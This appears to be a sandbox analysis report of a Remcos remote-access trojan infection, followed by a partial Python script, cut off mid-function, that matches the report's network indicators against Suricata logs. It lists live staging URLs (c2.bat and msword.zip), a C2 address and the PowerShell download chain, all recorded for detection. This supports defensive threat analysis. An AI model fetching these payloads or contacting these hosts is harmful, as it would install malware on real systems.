Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0027A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0027A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0026E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,36_2_0026E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0027A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,36_2_0027A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0023C622 FindFirstFileExW,36_2_0023C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_002766DC FindFirstFileW,FindNextFileW,FindClose,36_2_002766DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00277333 FindFirstFileW,FindClose,36_2_00277333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_002773D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,36_2_002773D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0026D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_0026D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0026DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_0026DC54
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F4A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00F4A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F4A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00F4A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F3E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,38_2_00F3E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F4A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,38_2_00F4A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F466DC FindFirstFileW,FindNextFileW,FindClose,38_2_00F466DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F0C622 FindFirstFileExW,38_2_00F0C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,38_2_00F473D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F47333 FindFirstFileW,FindClose,38_2_00F47333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F3D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00F3D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F3DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00F3DC54
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\msword
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\msword\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\

Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49822 -> 193.26.115.39:7009
Source: global traffic | TCP traffic: 192.168.2.4:49822 -> 193.26.115.39:7009
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1; Host: geoplugin.net; Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | IP Address: 193.26.115.39
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49830 -> 178.237.33.50:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49734 -> 193.26.115.39:443
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49737 -> 193.26.115.39:443
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49732 -> 193.26.115.39:443
Source: global traffic | HTTP traffic detected: GET /c2.bat HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: candwfarmsllc.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /W2.pdf HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: myguyapp.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /msword.zip HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: myguyapp.com; Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0027D889 InternetReadFile,SetEvent,GetLastError,SetEvent
Source: global traffic | HTTP traffic detected: GET /c2.bat HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: candwfarmsllc.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /W2.pdf HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: myguyapp.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /msword.zip HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: myguyapp.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1; Host: geoplugin.net; Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: candwfarmsllc.com
Source: global traffic | DNS traffic detected: DNS query: myguyapp.com
Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic | DNS traffic detected: DNS query: ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF
Source: global traffic | DNS traffic detected: DNS query: me-work.com
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: msword.exe.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: msword.exe.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: msword.exe.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: msword.exe.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000002.00000002.1693219999.0000000004FC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://candwfarmsllc.com
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000002.00000002.1690664991.0000000002D56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: msword.exe.13.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: msword.exe.13.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: msword.exe.13.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: msword.exe.13.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: msword.exe.13.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: msword.exe, 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe, 00000010.00000000.2027567502.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe.13.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: msword.exe.13.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: msword.exe.13.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: msword.exe.13.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: msword.exe.13.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1693219999.0000000004C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000000.2081554510.0000000000485000.00000002.00000001.01000000.00000010.sdmp, LinkHub.com, 00000024.00000000.2103224867.00000000002D5000.00000002.00000001.01000000.00000012.sdmp, LinkHub.com, 00000026.00000000.2206840035.0000000000FA5000.00000002.00000001.01000000.00000012.sdmp, LinkHub.com.28.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: msword.exe.13.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.dr | String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000002.00000002.1693219999.0000000004C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBdq
Source: mshta.exe, 00000000.00000003.1701548408.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1702282615.0000000005F12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1704093551.0000000005F12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://candwfarmsllc.c
Source: powershell.exe, 00000002.00000002.1693219999.0000000004E55000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://candwfarmsllc.com
Source: powershell.exe, 00000002.00000002.1693155357.00000000048A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmp, c2.hta | String found in binary or memory: https://candwfarmsllc.com/c2.bat
Source: powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1693219999.000000000541F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: cmd.exe, 00000004.00000002.2028777650.000000000348E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.2007892523.0000000003472000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.2008095310.000000000348C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/W2.p
Source: powershell.exe, 00000002.00000002.1693219999.0000000004FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1693219999.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2050275526.000000000076E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2050211929.0000000000740000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2050832433.00000000022D0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068797895.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068708312.0000000003110000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073447449.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072466480.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073547689.0000000002D08000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072688924.0000000002D3C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072595675.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073717534.0000000002D3D000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2077689242.0000000002D80000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2077398064.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2133237800.0000000002B10000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2133362486.0000000002C08000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2092302096.0000000002B3A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2094606704.0000000002E90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/W2.pdf
Source: tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/W2.pdf9
Source: tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/W2.pdfG
Source: tasklist.exe, 00000015.00000002.2073447449.0000000002C00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERD
Source: cmd.exe, 0000001E.00000002.2092302096.0000000002B3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/W2.pdfsD
Source: cmd.exe, 00000004.00000003.1682580513.000000000345D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msw
Source: cmd.exe, 00000004.00000003.1708975352.00000000034C4000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2050275526.000000000076E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2050211929.0000000000740000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2050832433.00000000022D0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068797895.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068708312.0000000003110000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073447449.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072466480.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073547689.0000000002D08000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072688924.0000000002D3C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072595675.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073717534.0000000002D3D000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2077689242.0000000002D80000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2077398064.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2133237800.0000000002B10000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2133362486.0000000002C08000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2092302096.0000000002B3A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2094606704.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2096003879.0000000003410000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zip
Source: cmd.exe, 00000021.00000002.2096003879.0000000003410000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipbN
Source: cmd.exe, 0000001E.00000002.2092302096.0000000002B3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipqD
Source: tasklist.exe, 00000015.00000003.2072466480.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072688924.0000000002D3C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072595675.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073717534.0000000002D3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipur
Source: Propose.com, 0000001C.00000003.2087736160.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087958038.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087599132.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087186951.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087243889.00000000001A5000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2094480482.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087370625.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087769877.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2094550176.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087286049.00000000001A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROA
Source: cmd.exe, 00000021.00000002.2095752286.00000000032C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP
Source: tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/mt
Source: powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: LinkHub.com.28.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49737 version: TLS 1.2
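The Networking table above gives a usable indicator set: the Remcos JA3 hash from ET rule 2036594, the 193.26.115.39:7009 C2 endpoint, the two staging hosts fetched with a WindowsPowerShell User-Agent, the geoplugin.net lookup and a DNS query whose last label is far too long to be a real TLD. What follows is an added example, not Joe Sandbox or Remcos code: it runs those indicators over Suricata-style eve.json records. The records themselves are constructed to mirror the rows above, and the allowlist of hosts PowerShell may download from and the TLD-length threshold are assumptions for the example.

```python
"""Match the Remcos network indicators from the report against Suricata
eve.json records.  Added example; the records below are constructed."""
import json

# Indicators taken from the Networking table above.
REMCOS_JA3 = "3b5074b1b5d032e5620f69f9f700ff0e"        # ET 2036594, Remcos 3.x/4.x TLS client
C2_ENDPOINTS = {("193.26.115.39", 7009)}
STAGING_HOSTS = {"candwfarmsllc.com", "myguyapp.com"}
GEOIP_HOSTS = {"geoplugin.net"}                         # legitimate service Remcos uses for geolocation
POWERSHELL_UA = "WindowsPowerShell/"
SCRIPT_OR_ARCHIVE = (".bat", ".ps1", ".vbs", ".js", ".hta", ".zip", ".exe")
# Assumption: hosts this environment expects PowerShell to download from.
POWERSHELL_ALLOWED_HOSTS = {"www.powershellgallery.com", "onegetcdn.azureedge.net"}
MAX_TLD_LEN = 24   # assumption: no delegated TLD is longer than this

# Constructed eve.json records shaped like the sandbox observations (not real captures).
SAMPLE_EVE = [
    json.dumps({"event_type": "tls", "src_ip": "192.168.2.4", "src_port": 49822,
                "dest_ip": "193.26.115.39", "dest_port": 7009,
                "tls": {"ja3": {"hash": REMCOS_JA3}}}),
    json.dumps({"event_type": "http", "src_ip": "192.168.2.4", "src_port": 49830,
                "dest_ip": "178.237.33.50", "dest_port": 80,
                "http": {"hostname": "geoplugin.net", "url": "/json.gp", "http_method": "GET"}}),
    json.dumps({"event_type": "http", "src_ip": "192.168.2.4", "src_port": 49732,
                "dest_ip": "193.26.115.39", "dest_port": 443,
                "http": {"hostname": "candwfarmsllc.com", "url": "/c2.bat", "http_method": "GET",
                         "http_user_agent": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) "
                                            "WindowsPowerShell/5.1.19041.1682"}}),
    json.dumps({"event_type": "http", "src_ip": "192.168.2.4", "src_port": 49900,
                "dest_ip": "93.184.216.34", "dest_port": 443,
                "http": {"hostname": "www.example.com", "url": "/index.html", "http_method": "GET",
                         "http_user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"}}),
    json.dumps({"event_type": "dns", "src_ip": "192.168.2.4", "dest_ip": "1.1.1.1",
                "dns": {"type": "query",
                        "rrname": "ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF"}}),
]


def _http_findings(ev, who):
    """Apply the HTTP-layer rules to one eve http record."""
    h = ev.get("http", {})
    host = h.get("hostname", "").lower()
    url = h.get("url", "")
    ua = h.get("http_user_agent", "")
    out = []
    if host in STAGING_HOSTS:
        out.append(("remcos_staging_host", f"{who} {host}{url}"))
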